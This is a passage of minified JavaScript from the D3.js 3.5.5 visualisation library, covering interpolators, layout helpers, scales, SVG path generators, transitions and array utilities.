1/2.75>n?7.5625*n*n:2/2.75>n?7.5625*(n-=1.5/2.75)*n+.75:2.5/2.75>n?7.5625*(n-=2.25/2.75)*n+.9375:7.5625*(n-=2.625/2.75)*n+.984375}function Lu(n,t){n=ta.hcl(n),t=ta.hcl(t);var e=n.h,r=n.c,u=n.l,i=t.h-e,o=t.c-r,a=t.l-u;return isNaN(o)&&(o=0,r=isNaN(r)?t.c:r),isNaN(i)?(i=0,e=isNaN(e)?t.h:e):i>180?i-=360:-180>i&&(i+=360),function(n){return st(e+i*n,r+o*n,u+a*n)+""}}function Tu(n,t){n=ta.hsl(n),t=ta.hsl(t);var e=n.h,r=n.s,u=n.l,i=t.h-e,o=t.s-r,a=t.l-u;return isNaN(o)&&(o=0,r=isNaN(r)?t.s:r),isNaN(i)?(i=0,e=isNaN(e)?t.h:e):i>180?i-=360:-180>i&&(i+=360),function(n){return ct(e+i*n,r+o*n,u+a*n)+""}}function Ru(n,t){n=ta.lab(n),t=ta.lab(t);var e=n.l,r=n.a,u=n.b,i=t.l-e,o=t.a-r,a=t.b-u;return function(n){return ht(e+i*n,r+o*n,u+a*n)+""}}function Du(n,t){return t-=n,function(e){return Math.round(n+t*e)}}function Pu(n){var t=[n.a,n.b],e=[n.c,n.d],r=ju(t),u=Uu(t,e),i=ju(Fu(e,t,-u))||0;t[0]*e[1]<e[0]*t[1]&&(t[0]*=-1,t[1]*=-1,r*=-1,u*=-1),this.rotate=(r?Math.atan2(t[1],t[0]):Math.atan2(-e[0],e[1]))*Pa,this.translate=[n.e,n.f],this.scale=[r,i],this.skew=i?Math.atan2(u,i)*Pa:0}function Uu(n,t){return n[0]*t[0]+n[1]*t[1]}function ju(n){var t=Math.sqrt(Uu(n,n));return t&&(n[0]/=t,n[1]/=t),t}function Fu(n,t,e){return n[0]+=e*t[0],n[1]+=e*t[1],n}function Hu(n,t){var e,r=[],u=[],i=ta.transform(n),o=ta.transform(t),a=i.translate,c=o.translate,l=i.rotate,s=o.rotate,f=i.skew,h=o.skew,g=i.scale,p=o.scale;return a[0]!=c[0]||a[1]!=c[1]?(r.push("translate(",null,",",null,")"),u.push({i:1,x:vu(a[0],c[0])},{i:3,x:vu(a[1],c[1])})):r.push(c[0]||c[1]?"translate("+c+")":""),l!=s?(l-s>180?s+=360:s-l>180&&(l+=360),u.push({i:r.push(r.pop()+"rotate(",null,")")-2,x:vu(l,s)})):s&&r.push(r.pop()+"rotate("+s+")"),f!=h?u.push({i:r.push(r.pop()+"skewX(",null,")")-2,x:vu(f,h)}):h&&r.push(r.pop()+"skewX("+h+")"),g[0]!=p[0]||g[1]!=p[1]?(e=r.push(r.pop()+"scale(",null,",",null,")"),u.push({i:e-4,x:vu(g[0],p[0])},{i:e-2,x:vu(g[1],p[1])})):(1!=p[0]||1!=p[1])&&r.push(r.pop()+"scale("+p+")"),e=u.length,function(n){for(var t,i=-1;++i<e;)r[(t=u[i]).i]=t.x(n);return r.join("")}}function Ou(n,t){return t=(t-=n=+n)||1/t,function(e){return(e-n)/t}}function Iu(n,t){return t=(t-=n=+n)||1/t,function(e){return Math.max(0,Math.min(1,(e-n)/t))}}function Yu(n){for(var t=n.source,e=n.target,r=Vu(t,e),u=[t];t!==r;)t=t.parent,u.push(t);for(var i=u.length;e!==r;)u.splice(i,0,e),e=e.parent;return u}function Zu(n){for(var t=[],e=n.parent;null!=e;)t.push(n),n=e,e=e.parent;return t.push(n),t}function Vu(n,t){if(n===t)return n;for(var e=Zu(n),r=Zu(t),u=e.pop(),i=r.pop(),o=null;u===i;)o=u,u=e.pop(),i=r.pop();return o}function Xu(n){n.fixed|=2}function $u(n){n.fixed&=-7}function Bu(n){n.fixed|=4,n.px=n.x,n.py=n.y}function Wu(n){n.fixed&=-5}function Ju(n,t,e){var r=0,u=0;if(n.charge=0,!n.leaf)for(var i,o=n.nodes,a=o.length,c=-1;++c<a;)i=o[c],null!=i&&(Ju(i,t,e),n.charge+=i.charge,r+=i.charge*i.cx,u+=i.charge*i.cy);if(n.point){n.leaf||(n.point.x+=Math.random()-.5,n.point.y+=Math.random()-.5);var l=t*e[n.point.index];n.charge+=n.pointCharge=l,r+=l*n.point.x,u+=l*n.point.y}n.cx=r/n.charge,n.cy=u/n.charge}function Gu(n,t){return ta.rebind(n,t,"sort","children","value"),n.nodes=n,n.links=ri,n}function Ku(n,t){for(var e=[n];null!=(n=e.pop());)if(t(n),(u=n.children)&&(r=u.length))for(var r,u;--r>=0;)e.push(u[r])}function Qu(n,t){for(var e=[n],r=[];null!=(n=e.pop());)if(r.push(n),(i=n.children)&&(u=i.length))for(var u,i,o=-1;++o<u;)e.push(i[o]);for(;null!=(n=r.pop());)t(n)}function ni(n){return n.children}function ti(n){return n.value}function ei(n,t){return t.value-n.value}function ri(n){return ta.merge(n.map(function(n){return(n.children||[]).map(function(t){return{source:n,target:t}})}))}function ui(n){return n.x}function ii(n){return n.y}function oi(n,t,e){n.y0=t,n.y=e}function ai(n){return ta.range(n.length)}function ci(n){for(var t=-1,e=n[0].length,r=[];++t<e;)r[t]=0;return r}function li(n){for(var t,e=1,r=0,u=n[0][1],i=n.length;i>e;++e)(t=n[e][1])>u&&(r=e,u=t);return r}function si(n){return n.reduce(fi,0)}function fi(n,t){return n+t[1]}function hi(n,t){return gi(n,Math.ceil(Math.log(t.length)/Math.LN2+1))}function gi(n,t){for(var e=-1,r=+n[0],u=(n[1]-r)/t,i=[];++e<=t;)i[e]=u*e+r;return i}function pi(n){return[ta.min(n),ta.max(n)]}function vi(n,t){return n.value-t.value}function di(n,t){var e=n._pack_next;n._pack_next=t,t._pack_prev=n,t._pack_next=e,e._pack_prev=t}function mi(n,t){n._pack_next=t,t._pack_prev=n}function yi(n,t){var e=t.x-n.x,r=t.y-n.y,u=n.r+t.r;return.999*u*u>e*e+r*r}function Mi(n){function t(n){s=Math.min(n.x-n.r,s),f=Math.max(n.x+n.r,f),h=Math.min(n.y-n.r,h),g=Math.max(n.y+n.r,g)}if((e=n.children)&&(l=e.length)){var e,r,u,i,o,a,c,l,s=1/0,f=-1/0,h=1/0,g=-1/0;if(e.forEach(xi),r=e[0],r.x=-r.r,r.y=0,t(r),l>1&&(u=e[1],u.x=u.r,u.y=0,t(u),l>2))for(i=e[2],wi(r,u,i),t(i),di(r,i),r._pack_prev=i,di(i,u),u=r._pack_next,o=3;l>o;o++){wi(r,u,i=e[o]);var p=0,v=1,d=1;for(a=u._pack_next;a!==u;a=a._pack_next,v++)if(yi(a,i)){p=1;break}if(1==p)for(c=r._pack_prev;c!==a._pack_prev&&!yi(c,i);c=c._pack_prev,d++);p?(d>v||v==d&&u.r<r.r?mi(r,u=a):mi(r=c,u),o--):(di(r,i),u=i,t(i))}var m=(s+f)/2,y=(h+g)/2,M=0;for(o=0;l>o;o++)i=e[o],i.x-=m,i.y-=y,M=Math.max(M,i.r+Math.sqrt(i.x*i.x+i.y*i.y));n.r=M,e.forEach(bi)}}function xi(n){n._pack_next=n._pack_prev=n}function bi(n){delete n._pack_next,delete n._pack_prev}function _i(n,t,e,r){var u=n.children;if(n.x=t+=r*n.x,n.y=e+=r*n.y,n.r*=r,u)for(var i=-1,o=u.length;++i<o;)_i(u[i],t,e,r)}function wi(n,t,e){var r=n.r+e.r,u=t.x-n.x,i=t.y-n.y;if(r&&(u||i)){var o=t.r+e.r,a=u*u+i*i;o*=o,r*=r;var c=.5+(r-o)/(2*a),l=Math.sqrt(Math.max(0,2*o*(r+a)-(r-=a)*r-o*o))/(2*a);e.x=n.x+c*u+l*i,e.y=n.y+c*i-l*u}else e.x=n.x+r,e.y=n.y}function Si(n,t){return n.parent==t.parent?1:2}function ki(n){var t=n.children;return t.length?t[0]:n.t}function Ei(n){var t,e=n.children;return(t=e.length)?e[t-1]:n.t}function Ai(n,t,e){var r=e/(t.i-n.i);t.c-=r,t.s+=e,n.c+=r,t.z+=e,t.m+=e}function Ni(n){for(var t,e=0,r=0,u=n.children,i=u.length;--i>=0;)t=u[i],t.z+=e,t.m+=e,e+=t.s+(r+=t.c)}function Ci(n,t,e){return n.a.parent===t.parent?n.a:e}function zi(n){return 1+ta.max(n,function(n){return n.y})}function qi(n){return n.reduce(function(n,t){return n+t.x},0)/n.length}function Li(n){var t=n.children;return t&&t.length?Li(t[0]):n}function Ti(n){var t,e=n.children;return e&&(t=e.length)?Ti(e[t-1]):n}function Ri(n){return{x:n.x,y:n.y,dx:n.dx,dy:n.dy}}function Di(n,t){var e=n.x+t[3],r=n.y+t[0],u=n.dx-t[1]-t[3],i=n.dy-t[0]-t[2];return 0>u&&(e+=u/2,u=0),0>i&&(r+=i/2,i=0),{x:e,y:r,dx:u,dy:i}}function Pi(n){var t=n[0],e=n[n.length-1];return e>t?[t,e]:[e,t]}function Ui(n){return n.rangeExtent?n.rangeExtent():Pi(n.range())}function ji(n,t,e,r){var u=e(n[0],n[1]),i=r(t[0],t[1]);return function(n){return i(u(n))}}function Fi(n,t){var e,r=0,u=n.length-1,i=n[r],o=n[u];return i>o&&(e=r,r=u,u=e,e=i,i=o,o=e),n[r]=t.floor(i),n[u]=t.ceil(o),n}function Hi(n){return n?{floor:function(t){return Math.floor(t/n)*n},ceil:function(t){return Math.ceil(t/n)*n}}:ml}function Oi(n,t,e,r){var u=[],i=[],o=0,a=Math.min(n.length,t.length)-1;for(n[a]<n[0]&&(n=n.slice().reverse(),t=t.slice().reverse());++o<=a;)u.push(e(n[o-1],n[o])),i.push(r(t[o-1],t[o]));return function(t){var e=ta.bisect(n,t,1,a)-1;return i[e](u[e](t))}}function Ii(n,t,e,r){function u(){var u=Math.min(n.length,t.length)>2?Oi:ji,c=r?Iu:Ou;return o=u(n,t,c,e),a=u(t,n,c,mu),i}function i(n){return o(n)}var o,a;return i.invert=function(n){return a(n)},i.domain=function(t){return arguments.length?(n=t.map(Number),u()):n},i.range=function(n){return arguments.length?(t=n,u()):t},i.rangeRound=function(n){return i.range(n).interpolate(Du)},i.clamp=function(n){return arguments.length?(r=n,u()):r},i.interpolate=function(n){return arguments.length?(e=n,u()):e},i.ticks=function(t){return Xi(n,t)},i.tickFormat=function(t,e){return $i(n,t,e)},i.nice=function(t){return Zi(n,t),u()},i.copy=function(){return Ii(n,t,e,r)},u()}function Yi(n,t){return ta.rebind(n,t,"range","rangeRound","interpolate","clamp")}function Zi(n,t){return Fi(n,Hi(Vi(n,t)[2]))}function Vi(n,t){null==t&&(t=10);var e=Pi(n),r=e[1]-e[0],u=Math.pow(10,Math.floor(Math.log(r/t)/Math.LN10)),i=t/r*u;return.15>=i?u*=10:.35>=i?u*=5:.75>=i&&(u*=2),e[0]=Math.ceil(e[0]/u)*u,e[1]=Math.floor(e[1]/u)*u+.5*u,e[2]=u,e}function Xi(n,t){return ta.range.apply(ta,Vi(n,t))}function $i(n,t,e){var r=Vi(n,t);if(e){var u=ic.exec(e);if(u.shift(),"s"===u[8]){var i=ta.formatPrefix(Math.max(ga(r[0]),ga(r[1])));return u[7]||(u[7]="."+Bi(i.scale(r[2]))),u[8]="f",e=ta.format(u.join("")),function(n){return e(i.scale(n))+i.symbol}}u[7]||(u[7]="."+Wi(u[8],r)),e=u.join("")}else e=",."+Bi(r[2])+"f";return ta.format(e)}function Bi(n){return-Math.floor(Math.log(n)/Math.LN10+.01)}function Wi(n,t){var e=Bi(t[2]);return n in yl?Math.abs(e-Bi(Math.max(ga(t[0]),ga(t[1]))))+ +("e"!==n):e-2*("%"===n)}function Ji(n,t,e,r){function u(n){return(e?Math.log(0>n?0:n):-Math.log(n>0?0:-n))/Math.log(t)}function i(n){return e?Math.pow(t,n):-Math.pow(t,-n)}function o(t){return n(u(t))}return o.invert=function(t){return i(n.invert(t))},o.domain=function(t){return arguments.length?(e=t[0]>=0,n.domain((r=t.map(Number)).map(u)),o):r},o.base=function(e){return arguments.length?(t=+e,n.domain(r.map(u)),o):t},o.nice=function(){var t=Fi(r.map(u),e?Math:xl);return n.domain(t),r=t.map(i),o},o.ticks=function(){var n=Pi(r),o=[],a=n[0],c=n[1],l=Math.floor(u(a)),s=Math.ceil(u(c)),f=t%1?2:t;if(isFinite(s-l)){if(e){for(;s>l;l++)for(var h=1;f>h;h++)o.push(i(l)*h);o.push(i(l))}else for(o.push(i(l));l++<s;)for(var h=f-1;h>0;h--)o.push(i(l)*h);for(l=0;o[l]<a;l++);for(s=o.length;o[s-1]>c;s--);o=o.slice(l,s)}return o},o.tickFormat=function(n,t){if(!arguments.length)return Ml;arguments.length<2?t=Ml:"function"!=typeof t&&(t=ta.format(t));var r,a=Math.max(.1,n/o.ticks().length),c=e?(r=1e-12,Math.ceil):(r=-1e-12,Math.floor);return function(n){return n/i(c(u(n)+r))<=a?t(n):""}},o.copy=function(){return Ji(n.copy(),t,e,r)},Yi(o,n)}function Gi(n,t,e){function r(t){return n(u(t))}var u=Ki(t),i=Ki(1/t);return r.invert=function(t){return i(n.invert(t))},r.domain=function(t){return arguments.length?(n.domain((e=t.map(Number)).map(u)),r):e},r.ticks=function(n){return Xi(e,n)},r.tickFormat=function(n,t){return $i(e,n,t)},r.nice=function(n){return r.domain(Zi(e,n))},r.exponent=function(o){return arguments.length?(u=Ki(t=o),i=Ki(1/t),n.domain(e.map(u)),r):t},r.copy=function(){return Gi(n.copy(),t,e)},Yi(r,n)}function Ki(n){return function(t){return 0>t?-Math.pow(-t,n):Math.pow(t,n)}}function Qi(n,t){function e(e){return i[((u.get(e)||("range"===t.t?u.set(e,n.push(e)):0/0))-1)%i.length]}function r(t,e){return ta.range(n.length).map(function(n){return t+e*n})}var u,i,o;return e.domain=function(r){if(!arguments.length)return n;n=[],u=new l;for(var i,o=-1,a=r.length;++o<a;)u.has(i=r[o])||u.set(i,n.push(i));return e[t.t].apply(e,t.a)},e.range=function(n){return arguments.length?(i=n,o=0,t={t:"range",a:arguments},e):i},e.rangePoints=function(u,a){arguments.length<2&&(a=0);var c=u[0],l=u[1],s=n.length<2?(c=(c+l)/2,0):(l-c)/(n.length-1+a);return i=r(c+s*a/2,s),o=0,t={t:"rangePoints",a:arguments},e},e.rangeRoundPoints=function(u,a){arguments.length<2&&(a=0);var c=u[0],l=u[1],s=n.length<2?(c=l=Math.round((c+l)/2),0):(l-c)/(n.length-1+a)|0;return i=r(c+Math.round(s*a/2+(l-c-(n.length-1+a)*s)/2),s),o=0,t={t:"rangeRoundPoints",a:arguments},e},e.rangeBands=function(u,a,c){arguments.length<2&&(a=0),arguments.length<3&&(c=a);var l=u[1]<u[0],s=u[l-0],f=u[1-l],h=(f-s)/(n.length-a+2*c);return i=r(s+h*c,h),l&&i.reverse(),o=h*(1-a),t={t:"rangeBands",a:arguments},e},e.rangeRoundBands=function(u,a,c){arguments.length<2&&(a=0),arguments.length<3&&(c=a);var l=u[1]<u[0],s=u[l-0],f=u[1-l],h=Math.floor((f-s)/(n.length-a+2*c));return i=r(s+Math.round((f-s-(n.length-a)*h)/2),h),l&&i.reverse(),o=Math.round(h*(1-a)),t={t:"rangeRoundBands",a:arguments},e},e.rangeBand=function(){return o},e.rangeExtent=function(){return Pi(t.a[0])},e.copy=function(){return Qi(n,t)},e.domain(n)}function no(n,t){function i(){var e=0,r=t.length;for(a=[];++e<r;)a[e-1]=ta.quantile(n,e/r);return o}function o(n){return isNaN(n=+n)?void 0:t[ta.bisect(a,n)]}var a;return o.domain=function(t){return arguments.length?(n=t.map(r).filter(u).sort(e),i()):n},o.range=function(n){return arguments.length?(t=n,i()):t},o.quantiles=function(){return a},o.invertExtent=function(e){return e=t.indexOf(e),0>e?[0/0,0/0]:[e>0?a[e-1]:n[0],e<a.length?a[e]:n[n.length-1]]},o.copy=function(){return no(n,t)},i()}function to(n,t,e){function r(t){return e[Math.max(0,Math.min(o,Math.floor(i*(t-n))))]}function u(){return i=e.length/(t-n),o=e.length-1,r}var i,o;return r.domain=function(e){return arguments.length?(n=+e[0],t=+e[e.length-1],u()):[n,t]},r.range=function(n){return arguments.length?(e=n,u()):e},r.invertExtent=function(t){return t=e.indexOf(t),t=0>t?0/0:t/i+n,[t,t+1/i]},r.copy=function(){return to(n,t,e)},u()}function eo(n,t){function e(e){return e>=e?t[ta.bisect(n,e)]:void 0}return e.domain=function(t){return arguments.length?(n=t,e):n},e.range=function(n){return arguments.length?(t=n,e):t},e.invertExtent=function(e){return e=t.indexOf(e),[n[e-1],n[e]]},e.copy=function(){return eo(n,t)},e}function ro(n){function t(n){return+n}return t.invert=t,t.domain=t.range=function(e){return arguments.length?(n=e.map(t),t):n},t.ticks=function(t){return Xi(n,t)},t.tickFormat=function(t,e){return $i(n,t,e)},t.copy=function(){return ro(n)},t}function uo(){return 0}function io(n){return n.innerRadius}function oo(n){return n.outerRadius}function ao(n){return n.startAngle}function co(n){return n.endAngle}function lo(n){return n&&n.padAngle}function so(n,t,e,r){return(n-e)*t-(t-r)*n>0?0:1}function fo(n,t,e,r,u){var i=n[0]-t[0],o=n[1]-t[1],a=(u?r:-r)/Math.sqrt(i*i+o*o),c=a*o,l=-a*i,s=n[0]+c,f=n[1]+l,h=t[0]+c,g=t[1]+l,p=(s+h)/2,v=(f+g)/2,d=h-s,m=g-f,y=d*d+m*m,M=e-r,x=s*g-h*f,b=(0>m?-1:1)*Math.sqrt(M*M*y-x*x),_=(x*m-d*b)/y,w=(-x*d-m*b)/y,S=(x*m+d*b)/y,k=(-x*d+m*b)/y,E=_-p,A=w-v,N=S-p,C=k-v;return E*E+A*A>N*N+C*C&&(_=S,w=k),[[_-c,w-l],[_*e/M,w*e/M]]}function ho(n){function t(t){function o(){l.push("M",i(n(s),a))}for(var c,l=[],s=[],f=-1,h=t.length,g=Et(e),p=Et(r);++f<h;)u.call(this,c=t[f],f)?s.push([+g.call(this,c,f),+p.call(this,c,f)]):s.length&&(o(),s=[]);return s.length&&o(),l.length?l.join(""):null}var e=Ar,r=Nr,u=Ne,i=go,o=i.key,a=.7;return t.x=function(n){return arguments.length?(e=n,t):e},t.y=function(n){return arguments.length?(r=n,t):r},t.defined=function(n){return arguments.length?(u=n,t):u},t.interpolate=function(n){return arguments.length?(o="function"==typeof n?i=n:(i=El.get(n)||go).key,t):o},t.tension=function(n){return arguments.length?(a=n,t):a},t}function go(n){return n.join("L")}function po(n){return go(n)+"Z"}function vo(n){for(var t=0,e=n.length,r=n[0],u=[r[0],",",r[1]];++t<e;)u.push("H",(r[0]+(r=n[t])[0])/2,"V",r[1]);return e>1&&u.push("H",r[0]),u.join("")}function mo(n){for(var t=0,e=n.length,r=n[0],u=[r[0],",",r[1]];++t<e;)u.push("V",(r=n[t])[1],"H",r[0]);return u.join("")}function yo(n){for(var t=0,e=n.length,r=n[0],u=[r[0],",",r[1]];++t<e;)u.push("H",(r=n[t])[0],"V",r[1]);return u.join("")}function Mo(n,t){return n.length<4?go(n):n[1]+_o(n.slice(1,-1),wo(n,t))}function xo(n,t){return n.length<3?go(n):n[0]+_o((n.push(n[0]),n),wo([n[n.length-2]].concat(n,[n[1]]),t))}function bo(n,t){return n.length<3?go(n):n[0]+_o(n,wo(n,t))}function _o(n,t){if(t.length<1||n.length!=t.length&&n.length!=t.length+2)return go(n);var e=n.length!=t.length,r="",u=n[0],i=n[1],o=t[0],a=o,c=1;if(e&&(r+="Q"+(i[0]-2*o[0]/3)+","+(i[1]-2*o[1]/3)+","+i[0]+","+i[1],u=n[1],c=2),t.length>1){a=t[1],i=n[c],c++,r+="C"+(u[0]+o[0])+","+(u[1]+o[1])+","+(i[0]-a[0])+","+(i[1]-a[1])+","+i[0]+","+i[1];for(var l=2;l<t.length;l++,c++)i=n[c],a=t[l],r+="S"+(i[0]-a[0])+","+(i[1]-a[1])+","+i[0]+","+i[1]}if(e){var s=n[c];r+="Q"+(i[0]+2*a[0]/3)+","+(i[1]+2*a[1]/3)+","+s[0]+","+s[1]}return r}function wo(n,t){for(var e,r=[],u=(1-t)/2,i=n[0],o=n[1],a=1,c=n.length;++a<c;)e=i,i=o,o=n[a],r.push([u*(o[0]-e[0]),u*(o[1]-e[1])]);return r}function So(n){if(n.length<3)return go(n);var t=1,e=n.length,r=n[0],u=r[0],i=r[1],o=[u,u,u,(r=n[1])[0]],a=[i,i,i,r[1]],c=[u,",",i,"L",No(Cl,o),",",No(Cl,a)];for(n.push(n[e-1]);++t<=e;)r=n[t],o.shift(),o.push(r[0]),a.shift(),a.push(r[1]),Co(c,o,a);return n.pop(),c.push("L",r),c.join("")}function ko(n){if(n.length<4)return go(n);for(var t,e=[],r=-1,u=n.length,i=[0],o=[0];++r<3;)t=n[r],i.push(t[0]),o.push(t[1]);for(e.push(No(Cl,i)+","+No(Cl,o)),--r;++r<u;)t=n[r],i.shift(),i.push(t[0]),o.shift(),o.push(t[1]),Co(e,i,o);return e.join("")}function Eo(n){for(var t,e,r=-1,u=n.length,i=u+4,o=[],a=[];++r<4;)e=n[r%u],o.push(e[0]),a.push(e[1]);for(t=[No(Cl,o),",",No(Cl,a)],--r;++r<i;)e=n[r%u],o.shift(),o.push(e[0]),a.shift(),a.push(e[1]),Co(t,o,a);return t.join("")}function Ao(n,t){var e=n.length-1;if(e)for(var r,u,i=n[0][0],o=n[0][1],a=n[e][0]-i,c=n[e][1]-o,l=-1;++l<=e;)r=n[l],u=l/e,r[0]=t*r[0]+(1-t)*(i+u*a),r[1]=t*r[1]+(1-t)*(o+u*c);return So(n)}function No(n,t){return n[0]*t[0]+n[1]*t[1]+n[2]*t[2]+n[3]*t[3]}function Co(n,t,e){n.push("C",No(Al,t),",",No(Al,e),",",No(Nl,t),",",No(Nl,e),",",No(Cl,t),",",No(Cl,e))}function zo(n,t){return(t[1]-n[1])/(t[0]-n[0])}function qo(n){for(var t=0,e=n.length-1,r=[],u=n[0],i=n[1],o=r[0]=zo(u,i);++t<e;)r[t]=(o+(o=zo(u=i,i=n[t+1])))/2;return r[t]=o,r}function Lo(n){for(var t,e,r,u,i=[],o=qo(n),a=-1,c=n.length-1;++a<c;)t=zo(n[a],n[a+1]),ga(t)<Ca?o[a]=o[a+1]=0:(e=o[a]/t,r=o[a+1]/t,u=e*e+r*r,u>9&&(u=3*t/Math.sqrt(u),o[a]=u*e,o[a+1]=u*r));for(a=-1;++a<=c;)u=(n[Math.min(c,a+1)][0]-n[Math.max(0,a-1)][0])/(6*(1+o[a]*o[a])),i.push([u||0,o[a]*u||0]);return i}function To(n){return n.length<3?go(n):n[0]+_o(n,Lo(n))}function Ro(n){for(var t,e,r,u=-1,i=n.length;++u<i;)t=n[u],e=t[0],r=t[1]-Ra,t[0]=e*Math.cos(r),t[1]=e*Math.sin(r);return n}function Do(n){function t(t){function c(){v.push("M",a(n(m),f),s,l(n(d.reverse()),f),"Z")}for(var h,g,p,v=[],d=[],m=[],y=-1,M=t.length,x=Et(e),b=Et(u),_=e===r?function(){return g}:Et(r),w=u===i?function(){return p}:Et(i);++y<M;)o.call(this,h=t[y],y)?(d.push([g=+x.call(this,h,y),p=+b.call(this,h,y)]),m.push([+_.call(this,h,y),+w.call(this,h,y)])):d.length&&(c(),d=[],m=[]);return d.length&&c(),v.length?v.join(""):null}var e=Ar,r=Ar,u=0,i=Nr,o=Ne,a=go,c=a.key,l=a,s="L",f=.7;return t.x=function(n){return arguments.length?(e=r=n,t):r},t.x0=function(n){return arguments.length?(e=n,t):e},t.x1=function(n){return arguments.length?(r=n,t):r
},t.y=function(n){return arguments.length?(u=i=n,t):i},t.y0=function(n){return arguments.length?(u=n,t):u},t.y1=function(n){return arguments.length?(i=n,t):i},t.defined=function(n){return arguments.length?(o=n,t):o},t.interpolate=function(n){return arguments.length?(c="function"==typeof n?a=n:(a=El.get(n)||go).key,l=a.reverse||a,s=a.closed?"M":"L",t):c},t.tension=function(n){return arguments.length?(f=n,t):f},t}function Po(n){return n.radius}function Uo(n){return[n.x,n.y]}function jo(n){return function(){var t=n.apply(this,arguments),e=t[0],r=t[1]-Ra;return[e*Math.cos(r),e*Math.sin(r)]}}function Fo(){return 64}function Ho(){return"circle"}function Oo(n){var t=Math.sqrt(n/qa);return"M0,"+t+"A"+t+","+t+" 0 1,1 0,"+-t+"A"+t+","+t+" 0 1,1 0,"+t+"Z"}function Io(n){return function(){var t,e;(t=this[n])&&(e=t[t.active])&&(--t.count?delete t[t.active]:delete this[n],t.active+=.5,e.event&&e.event.interrupt.call(this,this.__data__,e.index))}}function Yo(n,t,e){return ya(n,Pl),n.namespace=t,n.id=e,n}function Zo(n,t,e,r){var u=n.id,i=n.namespace;return Y(n,"function"==typeof e?function(n,o,a){n[i][u].tween.set(t,r(e.call(n,n.__data__,o,a)))}:(e=r(e),function(n){n[i][u].tween.set(t,e)}))}function Vo(n){return null==n&&(n=""),function(){this.textContent=n}}function Xo(n){return null==n?"__transition__":"__transition_"+n+"__"}function $o(n,t,e,r,u){var i=n[e]||(n[e]={active:0,count:0}),o=i[r];if(!o){var a=u.time;o=i[r]={tween:new l,time:a,delay:u.delay,duration:u.duration,ease:u.ease,index:t},u=null,++i.count,ta.timer(function(u){function c(e){if(i.active>r)return s();var u=i[i.active];u&&(--i.count,delete i[i.active],u.event&&u.event.interrupt.call(n,n.__data__,u.index)),i.active=r,o.event&&o.event.start.call(n,n.__data__,t),o.tween.forEach(function(e,r){(r=r.call(n,n.__data__,t))&&v.push(r)}),h=o.ease,f=o.duration,ta.timer(function(){return p.c=l(e||1)?Ne:l,1},0,a)}function l(e){if(i.active!==r)return 1;for(var u=e/f,a=h(u),c=v.length;c>0;)v[--c].call(n,a);return u>=1?(o.event&&o.event.end.call(n,n.__data__,t),s()):void 0}function s(){return--i.count?delete i[r]:delete n[e],1}var f,h,g=o.delay,p=ec,v=[];return p.t=g+a,u>=g?c(u-g):void(p.c=c)},0,a)}}function Bo(n,t,e){n.attr("transform",function(n){var r=t(n);return"translate("+(isFinite(r)?r:e(n))+",0)"})}function Wo(n,t,e){n.attr("transform",function(n){var r=t(n);return"translate(0,"+(isFinite(r)?r:e(n))+")"})}function Jo(n){return n.toISOString()}function Go(n,t,e){function r(t){return n(t)}function u(n,e){var r=n[1]-n[0],u=r/e,i=ta.bisect(Vl,u);return i==Vl.length?[t.year,Vi(n.map(function(n){return n/31536e6}),e)[2]]:i?t[u/Vl[i-1]<Vl[i]/u?i-1:i]:[Bl,Vi(n,e)[2]]}return r.invert=function(t){return Ko(n.invert(t))},r.domain=function(t){return arguments.length?(n.domain(t),r):n.domain().map(Ko)},r.nice=function(n,t){function e(e){return!isNaN(e)&&!n.range(e,Ko(+e+1),t).length}var i=r.domain(),o=Pi(i),a=null==n?u(o,10):"number"==typeof n&&u(o,n);return a&&(n=a[0],t=a[1]),r.domain(Fi(i,t>1?{floor:function(t){for(;e(t=n.floor(t));)t=Ko(t-1);return t},ceil:function(t){for(;e(t=n.ceil(t));)t=Ko(+t+1);return t}}:n))},r.ticks=function(n,t){var e=Pi(r.domain()),i=null==n?u(e,10):"number"==typeof n?u(e,n):!n.range&&[{range:n},t];return i&&(n=i[0],t=i[1]),n.range(e[0],Ko(+e[1]+1),1>t?1:t)},r.tickFormat=function(){return e},r.copy=function(){return Go(n.copy(),t,e)},Yi(r,n)}function Ko(n){return new Date(n)}function Qo(n){return JSON.parse(n.responseText)}function na(n){var t=ua.createRange();return t.selectNode(ua.body),t.createContextualFragment(n.responseText)}var ta={version:"3.5.5"},ea=[].slice,ra=function(n){return ea.call(n)},ua=this.document;if(ua)try{ra(ua.documentElement.childNodes)[0].nodeType}catch(ia){ra=function(n){for(var t=n.length,e=new Array(t);t--;)e[t]=n[t];return e}}if(Date.now||(Date.now=function(){return+new Date}),ua)try{ua.createElement("DIV").style.setProperty("opacity",0,"")}catch(oa){var aa=this.Element.prototype,ca=aa.setAttribute,la=aa.setAttributeNS,sa=this.CSSStyleDeclaration.prototype,fa=sa.setProperty;aa.setAttribute=function(n,t){ca.call(this,n,t+"")},aa.setAttributeNS=function(n,t,e){la.call(this,n,t,e+"")},sa.setProperty=function(n,t,e){fa.call(this,n,t+"",e)}}ta.ascending=e,ta.descending=function(n,t){return n>t?-1:t>n?1:t>=n?0:0/0},ta.min=function(n,t){var e,r,u=-1,i=n.length;if(1===arguments.length){for(;++u<i;)if(null!=(r=n[u])&&r>=r){e=r;break}for(;++u<i;)null!=(r=n[u])&&e>r&&(e=r)}else{for(;++u<i;)if(null!=(r=t.call(n,n[u],u))&&r>=r){e=r;break}for(;++u<i;)null!=(r=t.call(n,n[u],u))&&e>r&&(e=r)}return e},ta.max=function(n,t){var e,r,u=-1,i=n.length;if(1===arguments.length){for(;++u<i;)if(null!=(r=n[u])&&r>=r){e=r;break}for(;++u<i;)null!=(r=n[u])&&r>e&&(e=r)}else{for(;++u<i;)if(null!=(r=t.call(n,n[u],u))&&r>=r){e=r;break}for(;++u<i;)null!=(r=t.call(n,n[u],u))&&r>e&&(e=r)}return e},ta.extent=function(n,t){var e,r,u,i=-1,o=n.length;if(1===arguments.length){for(;++i<o;)if(null!=(r=n[i])&&r>=r){e=u=r;break}for(;++i<o;)null!=(r=n[i])&&(e>r&&(e=r),r>u&&(u=r))}else{for(;++i<o;)if(null!=(r=t.call(n,n[i],i))&&r>=r){e=u=r;break}for(;++i<o;)null!=(r=t.call(n,n[i],i))&&(e>r&&(e=r),r>u&&(u=r))}return[e,u]},ta.sum=function(n,t){var e,r=0,i=n.length,o=-1;if(1===arguments.length)for(;++o<i;)u(e=+n[o])&&(r+=e);else for(;++o<i;)u(e=+t.call(n,n[o],o))&&(r+=e);return r},ta.mean=function(n,t){var e,i=0,o=n.length,a=-1,c=o;if(1===arguments.length)for(;++a<o;)u(e=r(n[a]))?i+=e:--c;else for(;++a<o;)u(e=r(t.call(n,n[a],a)))?i+=e:--c;return c?i/c:void 0},ta.quantile=function(n,t){var 